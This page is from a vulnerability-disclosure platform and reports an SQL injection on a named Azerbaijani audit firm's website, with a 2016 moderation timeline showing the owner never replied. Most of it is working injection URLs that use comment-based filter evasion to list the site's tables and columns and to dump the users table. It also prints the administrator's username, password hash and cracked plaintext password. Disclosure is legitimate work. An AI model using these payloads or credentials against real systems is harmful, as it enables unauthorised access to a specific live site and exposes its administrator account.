Подробная информация
SQl inject here: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27%20%2F*!12345union*%2F%20%2F*!12345select*%2F%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20-%27
Table names: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(table_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.tables*/+/*!12345where*/+/*!12345table_schema=database()*/--+-%27
USers: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(column_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.columns*/+/*!12345where*/+/*!12345table_name=0x7573657273*/--+-%27
Username and password dump: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(username,0x3a,password)*/,9,10,11+/*!12345from*/+/*!12345users*/--+-%27
username: admin
password: 5edc2995b340ac9fd2cc555e94384c87 md5 hash( makaudit123 )
Скриншоты
Записи
-
21 Октябрь 2016, 14:01
Статус уязвимости
Нет ответа от источника -
04 Октябрь 2016, 10:04
Уязвимости присвоен балл
За перевод уязвимости дано переводчику 10 баллов -
04 Октябрь 2016, 10:04
Уязвимости присвоен балл
За перевод уязвимости дано автору 0 баллов -
07 Сентябрь 2016, 13:51
Статус уязвимости
Отправлено сообщение об уязвимости на электронный адрес источника -
07 Сентябрь 2016, 11:31
Уязвимости присвоен балл
Модератор присвоил 10 баллов из 10-и на уязвимости -
07 Сентябрь 2016, 11:12
Статус уязвимости
Подтверждено со стороны модератора -
06 Сентябрь 2016, 18:03
Уязвимость изменена
Уязвимость изменена -
30 Июнь 2016, 14:49
Уязвимость отказана
Linklər qeyd edilən məlumatı göstərmir. Zəhmət lmasa screenlər yollayın. -
22 Июнь 2016, 12:06
Добавлена уязвимость
Добавлена уязвимость на BUGemot